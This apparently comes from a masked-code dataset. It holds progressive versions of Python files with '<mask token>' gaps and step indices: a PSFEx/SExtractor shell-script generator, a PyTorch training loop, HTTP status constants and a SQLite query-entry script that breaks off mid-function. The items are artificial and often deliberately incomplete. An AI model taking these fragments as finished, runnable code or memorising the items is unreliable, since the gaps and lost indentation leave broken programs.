prefix = ''
f = open('psfex_all.sh','w')
f.write('\n')
f.write('#############################'+'\n')
f.write('##### Scripts for PSFEx #####'+'\n')
f.write('#############################'+'\n')
f.write('\n')
for i in np.arange(len(ic.fields)):
f.write('# ----- HSC field : '+ic.fields[i]+' ----- #'+'\n')
f.write('\n')
for j in np.arange(len(ic.filters)):
flt = ic.filters[j].split('-')[1]
f.write('rm -rfv prepsfex_'+flt+'.cat\n')
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+flt+'.cat ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('sex Images/'+prefix+ic.fields[i]+'-'+flt+'.fits -c prepsfex.sex -CATALOG_NAME prepsfex_'+ic.fields[i]+'-'+flt+'.cat -CATALOG_TYPE ASCII_HEAD ')
f.write('-DETECT_THRESH {0:.1f} -ANALYSIS_THRESH {0:.1f} '.format(ic.THRES_psf))
f.write(f"-MAG_ZEROPOINT {ic.MAG0:.1f} -GAIN {ic.GAIN0[i][j]:.1f} -SEEING_FWHM {ic.SEEING0:.2f}\n")
f.write('psfex prepsfex_'+flt+'.cat -c config.psfex ')
f.write(f"-SAMPLE_FWHMRANGE {ic.FWHMR_psf[0]:.1f},{ic.FWHMR_psf[1]:.1f} ")
f.write(f"-SAMPLE_MINSN {ic.MINSN_psf:.1f} -SAMPLE_MAXELLIP {ic.MAXEL_psf:.2f} ")
f.write('-OUTCAT_TYPE ASCII_HEAD -OUTCAT_NAME psf_'+ic.fields[i]+'-'+flt+'.cat ')
f.write('-CHECKPLOT_TYPE NONE -XML_NAME psf_'+ic.fields[i]+'-'+flt+'.xml\n')
f.write('mv -v prepsfex_'+flt+'.psf psf_'+ic.fields[i]+'-'+flt+'.psf\n')
f.write('\n')
f.write('\n\n')
f.close()
# ----- Running scripts for PSFEx ----- #
if (glob.glob("PSFEx/") == []):
os.system("mkdir PSFEx")
else:
os.system("rm -rfv PSFEx/*")
os.system("sh psfex_all.sh")
os.system("mv -v psf_*.cat psf_*.xml psf_*.psf PSFEx/")
os.system("mv -v prepsfex_*-*.cat PSFEx/")
os.system("rm -rfv ./*.fits prepsfex_*.cat")
# Printing the running time
print("--- %s seconds ---" % (time.time() - start_time))
| [
0,
1,
2,
3,
4
] |
91 | 81688d51696156905736b5de7a4929387fd385ab | <mask token>
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses], prefix=f'Epoch: [{epoch}]\t')
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar('time/data/train', d_time, global_step)
report = model.training_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
writer.add_scalar(f'{k}/train', v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar('time/batch/train', b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
<mask token>
def main(cfg, pool=None):
model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool
)
if getattr(cfg, 'load_model', False):
model.load_ckpt()
if model.device != 'cpu' and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f'\nEpoch {epoch} Training')
train(cfg, epoch, train_loader, model)
filename = 'checkpoint.pth.tar'
if not getattr(cfg.log, 'overwrite_ckpt', True):
filename = '_'.join([str(epoch), filename])
save_checkpoint(state={'epoch': epoch, 'global_step': model.
global_step, 'state_dict': model.state_dict(), 'opt_state_dict':
{k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':
cfg}, directory=cfg.log.misc_dir, filename=filename)
time_print('\nTest')
test(cfg, test_loader, model)
<mask token>
| <mask token>
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses], prefix=f'Epoch: [{epoch}]\t')
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar('time/data/train', d_time, global_step)
report = model.training_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
writer.add_scalar(f'{k}/train', v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar('time/batch/train', b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
def test(cfg, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
metrics = ['performance']
metrics = {m: AverageMeter(m, ':.4e') for m in metrics}
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses, *metrics.values()], prefix='Test:\t')
model.eval()
global_step = model.global_step
end = time.time()
for batch_nb, batch in enumerate(data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
report = model.test_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
if k not in metrics:
metrics[k] = AverageMeter(k, ':.3f')
metrics[k].update(v)
batch_time.update(time.time() - end)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
writer.add_scalar('loss/test', losses.avg, global_step)
writer.add_scalar('time/batch/test', batch_time.avg, global_step)
writer.add_scalar('time/data/test', data_time.avg, global_step)
for k, v in metrics.items():
writer.add_scalar(f'{k}/test', v.avg, global_step)
progress.display(len(data_loader) - 1, time_print)
def main(cfg, pool=None):
model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool
)
if getattr(cfg, 'load_model', False):
model.load_ckpt()
if model.device != 'cpu' and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f'\nEpoch {epoch} Training')
train(cfg, epoch, train_loader, model)
filename = 'checkpoint.pth.tar'
if not getattr(cfg.log, 'overwrite_ckpt', True):
filename = '_'.join([str(epoch), filename])
save_checkpoint(state={'epoch': epoch, 'global_step': model.
global_step, 'state_dict': model.state_dict(), 'opt_state_dict':
{k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':
cfg}, directory=cfg.log.misc_dir, filename=filename)
time_print('\nTest')
test(cfg, test_loader, model)
<mask token>
| <mask token>
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses], prefix=f'Epoch: [{epoch}]\t')
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar('time/data/train', d_time, global_step)
report = model.training_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
writer.add_scalar(f'{k}/train', v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar('time/batch/train', b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
def test(cfg, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
metrics = ['performance']
metrics = {m: AverageMeter(m, ':.4e') for m in metrics}
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses, *metrics.values()], prefix='Test:\t')
model.eval()
global_step = model.global_step
end = time.time()
for batch_nb, batch in enumerate(data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
report = model.test_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
if k not in metrics:
metrics[k] = AverageMeter(k, ':.3f')
metrics[k].update(v)
batch_time.update(time.time() - end)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
writer.add_scalar('loss/test', losses.avg, global_step)
writer.add_scalar('time/batch/test', batch_time.avg, global_step)
writer.add_scalar('time/data/test', data_time.avg, global_step)
for k, v in metrics.items():
writer.add_scalar(f'{k}/test', v.avg, global_step)
progress.display(len(data_loader) - 1, time_print)
def main(cfg, pool=None):
model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool
)
if getattr(cfg, 'load_model', False):
model.load_ckpt()
if model.device != 'cpu' and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f'\nEpoch {epoch} Training')
train(cfg, epoch, train_loader, model)
filename = 'checkpoint.pth.tar'
if not getattr(cfg.log, 'overwrite_ckpt', True):
filename = '_'.join([str(epoch), filename])
save_checkpoint(state={'epoch': epoch, 'global_step': model.
global_step, 'state_dict': model.state_dict(), 'opt_state_dict':
{k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':
cfg}, directory=cfg.log.misc_dir, filename=filename)
time_print('\nTest')
test(cfg, test_loader, model)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Run script')
parser.add_argument('--config', '-c', type=str, required=False, default
='config')
args = parser.parse_args()
git_state = get_git_state()
config = importlib.import_module(f'configs.{args.config}').config
config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(
'%Y-%m-%d_%H:%M:%S')
config.log.misc_dir = config.log.dir / 'misc' / config.log.exp_id
config.log.tb_dir = config.log.dir / 'tb' / config.log.exp_id
config.log.misc_dir.mkdir(exist_ok=True, parents=True)
config.log.tb_dir.mkdir(exist_ok=True, parents=True)
torch.manual_seed(config.rnd_seed)
np.random.seed(config.rnd_seed)
random.seed(config.rnd_seed)
if getattr(config, 'anomaly_detection', False):
torch.autograd.set_detect_anomaly(True)
global writer
writer = SummaryWriter(log_dir=config.log.tb_dir, comment=
f'{config.description}, {git_state}')
time_print(pprint.pformat(config))
time_print(f'Git head at state: {git_state}')
try:
if (npp := getattr(config, 'n_process_pool', 0)):
with torch.multiprocessing.Pool(npp) as pool:
main(config, pool=pool)
else:
main(config)
except KeyboardInterrupt:
time_print(f'Keyboard interrupt')
exit(0)
| import argparse
import datetime
import importlib
import pprint
import time
import random
import numpy as np
import torch
from torch.utils.tensorboard import SummaryWriter
from utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses], prefix=f'Epoch: [{epoch}]\t')
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar('time/data/train', d_time, global_step)
report = model.training_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
writer.add_scalar(f'{k}/train', v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar('time/batch/train', b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
def test(cfg, data_loader, model):
data_time = AverageMeter('Data', ':6.3f')
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
metrics = ['performance']
metrics = {m: AverageMeter(m, ':.4e') for m in metrics}
progress = ProgressMeter(len(data_loader) - 1, [batch_time, data_time,
losses, *metrics.values()], prefix='Test:\t')
model.eval()
global_step = model.global_step
end = time.time()
for batch_nb, batch in enumerate(data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
report = model.test_step(batch, batch_nb)
losses.update(report['loss'])
for k, v in report.items():
if k not in metrics:
metrics[k] = AverageMeter(k, ':.3f')
metrics[k].update(v)
batch_time.update(time.time() - end)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x,
end='\r'))
writer.add_scalar('loss/test', losses.avg, global_step)
writer.add_scalar('time/batch/test', batch_time.avg, global_step)
writer.add_scalar('time/data/test', data_time.avg, global_step)
for k, v in metrics.items():
writer.add_scalar(f'{k}/test', v.avg, global_step)
progress.display(len(data_loader) - 1, time_print)
def main(cfg, pool=None):
model = importlib.import_module(f'models.{cfg.model}').Model(cfg, pool=pool
)
if getattr(cfg, 'load_model', False):
model.load_ckpt()
if model.device != 'cpu' and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f'\nEpoch {epoch} Training')
train(cfg, epoch, train_loader, model)
filename = 'checkpoint.pth.tar'
if not getattr(cfg.log, 'overwrite_ckpt', True):
filename = '_'.join([str(epoch), filename])
save_checkpoint(state={'epoch': epoch, 'global_step': model.
global_step, 'state_dict': model.state_dict(), 'opt_state_dict':
{k: v.state_dict() for k, v in model.optimizers.items()}, 'cfg':
cfg}, directory=cfg.log.misc_dir, filename=filename)
time_print('\nTest')
test(cfg, test_loader, model)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Run script')
parser.add_argument('--config', '-c', type=str, required=False, default
='config')
args = parser.parse_args()
git_state = get_git_state()
config = importlib.import_module(f'configs.{args.config}').config
config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime(
'%Y-%m-%d_%H:%M:%S')
config.log.misc_dir = config.log.dir / 'misc' / config.log.exp_id
config.log.tb_dir = config.log.dir / 'tb' / config.log.exp_id
config.log.misc_dir.mkdir(exist_ok=True, parents=True)
config.log.tb_dir.mkdir(exist_ok=True, parents=True)
torch.manual_seed(config.rnd_seed)
np.random.seed(config.rnd_seed)
random.seed(config.rnd_seed)
if getattr(config, 'anomaly_detection', False):
torch.autograd.set_detect_anomaly(True)
global writer
writer = SummaryWriter(log_dir=config.log.tb_dir, comment=
f'{config.description}, {git_state}')
time_print(pprint.pformat(config))
time_print(f'Git head at state: {git_state}')
try:
if (npp := getattr(config, 'n_process_pool', 0)):
with torch.multiprocessing.Pool(npp) as pool:
main(config, pool=pool)
else:
main(config)
except KeyboardInterrupt:
time_print(f'Keyboard interrupt')
exit(0)
| import argparse
import datetime
import importlib
import pprint
import time
import random
import numpy as np
import torch
from torch.utils.tensorboard import SummaryWriter
from utils import get_git_state, time_print, AverageMeter, ProgressMeter, save_checkpoint
def train(cfg, epoch, data_loader, model):
data_time = AverageMeter("Data", ":6.3f")
batch_time = AverageMeter("Time", ":6.3f")
losses = AverageMeter("Loss", ":.4e")
progress = ProgressMeter(
len(data_loader)-1,
[batch_time, data_time, losses],
prefix=f"Epoch: [{epoch}]\t")
model.train()
end = time.time()
for batch_nb, batch in enumerate(data_loader):
d_time = time.time() - end
data_time.update(d_time)
global_step = model.global_step
writer.add_scalar("time/data/train", d_time, global_step)
report = model.training_step(batch, batch_nb)
losses.update(report["loss"])
for k, v in report.items():
writer.add_scalar(f"{k}/train", v, global_step)
b_time = time.time() - end
batch_time.update(b_time)
writer.add_scalar("time/batch/train", b_time, global_step)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end="\r"))
def test(cfg, data_loader, model):
data_time = AverageMeter("Data", ":6.3f")
batch_time = AverageMeter("Time", ":6.3f")
losses = AverageMeter("Loss", ":.4e")
metrics = ["performance"]
metrics = {m: AverageMeter(m, ":.4e") for m in metrics}
progress = ProgressMeter(
len(data_loader)-1,
[batch_time, data_time, losses, *metrics.values()],
prefix="Test:\t")
model.eval()
global_step = model.global_step
end = time.time()
for batch_nb, batch in enumerate(data_loader):
data_time.update(time.time() - end)
with torch.no_grad():
report = model.test_step(batch, batch_nb)
losses.update(report["loss"])
for k, v in report.items():
if k not in metrics:
metrics[k] = AverageMeter(k, ":.3f")
metrics[k].update(v)
batch_time.update(time.time() - end)
end = time.time()
if batch_nb % cfg.log.freq == 0 or batch_nb == len(data_loader) - 1:
progress.display(batch_nb, print_fn=lambda *x: time_print(*x, end="\r"))
writer.add_scalar("loss/test", losses.avg, global_step)
writer.add_scalar("time/batch/test", batch_time.avg, global_step)
writer.add_scalar("time/data/test", data_time.avg, global_step)
for k,v in metrics.items():
writer.add_scalar(f"{k}/test", v.avg, global_step)
progress.display(len(data_loader) - 1, time_print)
def main(cfg, pool=None):
model = importlib.import_module(f"models.{cfg.model}").Model(cfg, pool=pool)
if getattr(cfg, "load_model", False):
model.load_ckpt()
if model.device != "cpu" and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
model = model.to(model.device)
train_loader = model.get_train_loader()
test_loader = model.get_test_loader()
for epoch in range(cfg.num_epoch):
time_print(f"\nEpoch {epoch} Training")
train(cfg, epoch, train_loader, model)
filename = "checkpoint.pth.tar"
if not getattr(cfg.log, "overwrite_ckpt", True):
filename = "_".join([str(epoch), filename])
save_checkpoint(
state={
"epoch": epoch,
"global_step": model.global_step,
"state_dict": model.state_dict(),
"opt_state_dict": {k: v.state_dict() for k,v in model.optimizers.items()},
"cfg": cfg,
},
directory=cfg.log.misc_dir,
filename=filename)
time_print("\nTest")
test(cfg, test_loader, model)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Run script")
parser.add_argument("--config", "-c",type=str, required=False, default="config")
args = parser.parse_args()
git_state = get_git_state()
config = importlib.import_module(f"configs.{args.config}").config
config.log.exp_id = git_state[1][:7] + datetime.datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
config.log.misc_dir = config.log.dir / "misc" / config.log.exp_id
config.log.tb_dir = config.log.dir / "tb" / config.log.exp_id
config.log.misc_dir.mkdir(exist_ok=True, parents=True)
config.log.tb_dir.mkdir(exist_ok=True, parents=True)
torch.manual_seed(config.rnd_seed)
np.random.seed(config.rnd_seed)
random.seed(config.rnd_seed)
if getattr(config, "anomaly_detection", False):
torch.autograd.set_detect_anomaly(True)
global writer
writer = SummaryWriter(
log_dir=config.log.tb_dir,
comment=f"{config.description}, {git_state}")
time_print(pprint.pformat(config))
time_print(f"Git head at state: {git_state}")
try:
if npp:=getattr(config, "n_process_pool", 0):
with torch.multiprocessing.Pool(npp) as pool:
main(config, pool=pool)
else:
main(config)
except KeyboardInterrupt:
time_print(f"Keyboard interrupt")
exit(0) | [
2,
3,
4,
5,
6
] |
92 | d90942f22cbbd9cfc3a431b7857cd909a7690966 | <mask token>
| OK = 200
CREATED = 201
NOT_MODIFIED = 304
UNAUTHORIZED = 401
FORBIDDEN = 403
BAD_REQUEST = 400
NOT_FOUND = 404
CONFLICT = 409
UNPROCESSABLE = 422
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
SERVICE_UNAVAILABLE = 503
ADMIN = 'admin'
ELITE = 'elite'
NOOB = 'noob'
WITHDRAW = 'withdraw'
FUND = 'fund'
| OK = 200
CREATED = 201
NOT_MODIFIED = 304
UNAUTHORIZED = 401
FORBIDDEN = 403
BAD_REQUEST = 400
NOT_FOUND = 404
CONFLICT = 409
UNPROCESSABLE = 422
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
SERVICE_UNAVAILABLE = 503
ADMIN = 'admin'
ELITE = 'elite'
NOOB = 'noob'
WITHDRAW = 'withdraw'
FUND = 'fund'
| null | null | [
0,
1,
2
] |
93 | 54ec1961f4835f575e7129bd0b2fcdeb97be2f03 | <mask token>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
<mask token>
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
<mask token>
| <mask token>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
<mask token>
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
<mask token>
| <mask token>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
def main():
config = configparser.ConfigParser()
config.read('config.ini')
db_path = config['db']['path']
conn = sqlite3.connect(db_path)
db_name = input_db_name(conn)
nlq = input_nlq()
num_cols = input_num_cols()
tsq = TableSketchQuery(num_cols)
tsq.types = input_tsq_types(num_cols)
tsq_row_count = input_tsq_row_count()
for i in range(tsq_row_count):
tsq.values.append(input_tsq_row(i + 1, tsq.types))
tsq.order = input_order()
tsq.limit = input_limit()
print(tsq.to_proto())
cur = conn.cursor()
cur.execute(
"""INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
VALUES (?, ?, ?, ?, ?, ?)"""
, (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().
SerializeToString(), 'waiting', int(time.time())))
conn.commit()
conn.close()
<mask token>
| <mask token>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
def main():
config = configparser.ConfigParser()
config.read('config.ini')
db_path = config['db']['path']
conn = sqlite3.connect(db_path)
db_name = input_db_name(conn)
nlq = input_nlq()
num_cols = input_num_cols()
tsq = TableSketchQuery(num_cols)
tsq.types = input_tsq_types(num_cols)
tsq_row_count = input_tsq_row_count()
for i in range(tsq_row_count):
tsq.values.append(input_tsq_row(i + 1, tsq.types))
tsq.order = input_order()
tsq.limit = input_limit()
print(tsq.to_proto())
cur = conn.cursor()
cur.execute(
"""INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
VALUES (?, ?, ?, ?, ?, ?)"""
, (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().
SerializeToString(), 'waiting', int(time.time())))
conn.commit()
conn.close()
if __name__ == '__main__':
main()
| import configparser
import sqlite3
import time
import uuid
from duoquest.tsq import TableSketchQuery
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
